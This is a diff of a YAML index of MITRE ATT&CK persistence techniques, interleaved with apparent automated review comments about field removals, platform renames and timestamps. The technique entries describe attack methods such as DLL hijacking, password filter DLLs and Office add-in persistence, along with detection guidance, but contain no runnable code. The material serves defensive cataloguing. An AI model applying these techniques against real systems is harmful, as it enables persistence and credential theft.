+ modified: '2024-10-15T16:01:21.255Z'
+ name: Office Application Startup
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Nick Carr, Mandiant
- Microsoft Threat Intelligence Center (MSTIC)
@@ -28872,79 +29253,73 @@ persistence:
- Praetorian
- Loic Jaquemet
- Ricardo Dias
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+ Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.4'
+ x_mitre_data_sources:
+ - 'File: File Creation'
+ - 'Application Log: Application Log Content'
+ - 'Windows Registry: Windows Registry Key Modification'
+ - 'File: File Modification'
+ - 'Module: Module Load'
+ - 'Process: Process Creation'
+ - 'Windows Registry: Windows Registry Key Creation'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137
url: https://attack.mitre.org/techniques/T1137
- - source_name: SensePost Ruler GitHub
- url: https://github.com/sensepost/ruler
- description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
- services. Retrieved February 4, 2019.'
+ external_id: T1137
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: TechNet O365 Outlook Rules
- url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
description: Koeller, B.. (2018, February 21). Defending Against Rules and
Forms Injection. Retrieved November 5, 2019.
+ url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
- source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: SensePost Ruler GitHub
+ description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+ services. Retrieved February 4, 2019.'
+ url: https://github.com/sensepost/ruler
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- x_mitre_detection: |-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
- Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
- x_mitre_version: '1.3'
+ url: https://github.com/sensepost/notruler
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'File: File Creation'
- - 'Application Log: Application Log Content'
- - 'Windows Registry: Windows Registry Key Modification'
- - 'File: File Modification'
- - 'Module: Module Load'
- - 'Process: Process Creation'
- - 'Windows Registry: Windows Registry Key Creation'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1137
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
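Review bot: `x_mitre_permissions_required` (User, Administrator) is removed from T1137 here and nothing in the patch re-adds it, whereas the other removed keys (`spec_version`, `x_mitre_attack_spec_version: 2.1.0`) are replaced by `x_mitre_attack_spec_version: 3.2.0`. If that field was retired with ATT&CK spec 3.2.0 the deletion is expected, but the PR description should say so, because the same deletion recurs for every object in this patch and a reviewer otherwise reads it as data loss. Also confirm that the removed `name`, `description`, `x_mitre_detection`, `x_mitre_version: '1.3'` and `x_mitre_data_sources` for T1137 are moved above this hunk rather than dropped; within the visible lines only the reordered `SensePost NotRuler` url and the `Outlook Today Home Page` reference come back.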
@@ -28974,6 +29349,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -28984,6 +29360,7 @@ persistence:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -28992,13 +29369,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
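Review bot: The platform list for T1098.003 replaces `Office 365` and `Azure AD` with `Office Suite` and `Identity Provider` and drops `Google Workspace` with no replacement, carried by only a minor bump (2.4 to 2.5). Anything that filters or indexes techniques by platform string needs the same rename or T1098.003 silently falls out of the Google Workspace and Azure AD views; note the platform consolidation in the PR description and spot-check the generated per-platform indexes for this technique.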
@@ -29040,9 +29417,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -29110,19 +29484,18 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -29138,8 +29511,8 @@ persistence:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -29153,7 +29526,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -29179,6 +29552,10 @@ persistence:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
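Review bot: The new `Hexacorn DLL Hijacking` reference pairs with the `(Citation: Hexacorn DLL Hijacking)` tag added to the T1574.001 description earlier in the patch, so the citation resolves. While this reference block is being touched, the adjacent `Microsoft Security Advisory 2269637` entry has an empty year in its date, `(, May 23)`; that is pre-existing, but it is a one-token fix worth folding in here, or upstream if this file is regenerated from the ATT&CK export.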
@@ -29206,42 +29583,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1137.006:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
- type: attack-pattern
- created: '2019-11-07T19:52:52.801Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.006
- url: https://attack.mitre.org/techniques/T1137/006
- - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
- description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
- source_name: Microsoft Office Add-ins
- - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
- Persistence. Retrieved July 3, 2017.
- source_name: MRWLabs Office Persistence Add-ins
- - source_name: FireEye Mail CDS 2018
- url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
- description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
- Enterprise Email Compromise. Retrieved April 22, 2019.
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:37:09.190Z'
name: 'Office Application Startup: Add-ins'
description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
on a compromised system. Office add-ins can be used to add functionality to
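Review bot: This hunk removes T1137.006's `id`, `type`, `created`, `created_by_ref`, `external_references`, `x_mitre_platforms`, `x_mitre_domains` and `object_marking_refs` wholesale, and the next hunk re-adds the same keys at the bottom of the object with the four references in a different order (FireEye, MRWLabs, Microsoft, GlobalDotName instead of Microsoft, MRWLabs, FireEye, GlobalDotName). Source names, descriptions and URLs are identical, so this is key-order churn from the exporter, not a content change; if the file is refreshed regularly, emitting keys and reference lists in a stable order would keep future diffs to the real changes (`modified`, citations, platforms) and make hunks of this size reviewable.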
@@ -29256,13 +29602,18 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Modification'
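Review bot: T1137.006's platforms change from `Windows`/`Office 365` to `Windows`/`Office Suite` with a 1.1 to 1.2 bump, the same platform rename applied to T1098.003 earlier in this patch; keep that rename consistent across every object and in any platform-keyed index. The `x_mitre_detection` context line ending in "suspicious or malicious behavior" still lacks its terminating period; pre-existing, not this hunk's doing.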
@@ -29270,11 +29621,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Creation'
- 'Process: Process Creation'
- 'File: File Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+ created: '2019-11-07T19:52:52.801Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/006
+ external_id: T1137.006
+ - source_name: FireEye Mail CDS 2018
+ description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+ Enterprise Email Compromise. Retrieved April 22, 2019.
+ url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+ - source_name: MRWLabs Office Persistence Add-ins
+ description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+ Persistence. Retrieved July 3, 2017.
+ url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+ - source_name: Microsoft Office Add-ins
+ description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+ url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.006
atomic_tests: []
T1505.002:
@@ -29305,7 +29679,7 @@ persistence:
url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
remote code execution. Retrieved June 24, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T17:05:44.321Z'
name: 'Server Software Component: Transport Agent'
description: "Adversaries may abuse Microsoft transport agents to establish
persistent access to systems. Microsoft Exchange transport agents can operate
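Review bot: The `modified` timestamp for T1505.002 goes backwards, from `2022-04-25T14:00:00.188Z` to `2021-10-18T17:05:44.321Z`, while every other object in this patch moves forward to a 2024 date. A regressing timestamp usually means this object was pulled from an older snapshot than the one the file currently holds, or that an earlier import wrote a synthetic value; verify which is authoritative before merging, since any consumer that syncs on `modified` will treat the post-patch object as stale.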
@@ -29343,13 +29717,11 @@ persistence:
- SYSTEM
- Administrator
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.002
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
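Review bot: For T1505.002 this hunk removes `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` but, unlike every other object in the patch, no `x_mitre_attack_spec_version: 3.2.0` line is added in the visible context. Together with the rolled-back `modified` date in the previous hunk this suggests T1505.002 was not refreshed from the same source as the rest; confirm the object still carries an attack spec version after the patch, or the consumer reading that key will see a missing field for this one technique.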
@@ -29375,7 +29747,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -29417,7 +29789,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -29495,11 +29866,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29579,35 +29949,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -29631,71 +29976,60 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1505.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
- created: '2022-03-28T15:34:44.590Z'
- x_mitre_version: '1.0'
- external_references:
- - source_name: mitre-attack
- external_id: T1505.005
- url: https://attack.mitre.org/techniques/T1505/005
- - source_name: James TermServ DLL
- url: https://twitter.com/james_inthe_box/status/1150495335812177920
- description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
- 2022.
- - source_name: Microsoft System Services Fundamentals
- url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
- description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
- Retrieved March 28, 2022.
- - source_name: Microsoft Remote Desktop Services
- url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
- description: Microsoft. (2019, August 23). About Remote Desktop Services.
- Retrieved March 28, 2022.
- - source_name: RDPWrap Github
- url: https://github.com/stascorp/rdpwrap
- description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
- Retrieved March 28, 2022.
- - source_name: Windows OS Hub RDP
- url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
- description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
- Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:42.810Z'
+ name: 'Server Software Component: Terminal Services DLL'
description: |-
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe
) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll
.(Citation: Microsoft System Services Fundamentals) The termsrv.dll
file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll
value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll
functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll
file or modifying the ServiceDll
value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Server Software Component: Terminal Services DLL'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for changes to Registry keys associated with ServiceDll
and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\
.
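Review bot: T1556.002 moves from `x_mitre_version: '2.0'` to `'2.1'` with `modified` 2024-08-21, but the only changes visible in this hunk are key reordering, the new `revoked: false` and `x_mitre_deprecated: false` flags, and the dropped `x_mitre_permissions_required` (Administrator, SYSTEM); description and detection text are untouched context. If the bump reflects an upstream edit outside the visible lines that is fine, otherwise it is a version change with no content change and worth a sentence in the PR description. For T1505.005 the hunk removes `x_mitre_version: '1.0'`, `x_mitre_deprecated: false` and `revoked: false` at the top of the object; `x_mitre_deprecated` is re-added below and the rest return in the next hunk, so nothing is lost.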
@@ -29704,24 +30038,56 @@ persistence:
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe
) or modify/replace the legitimate termsrv.dll
.
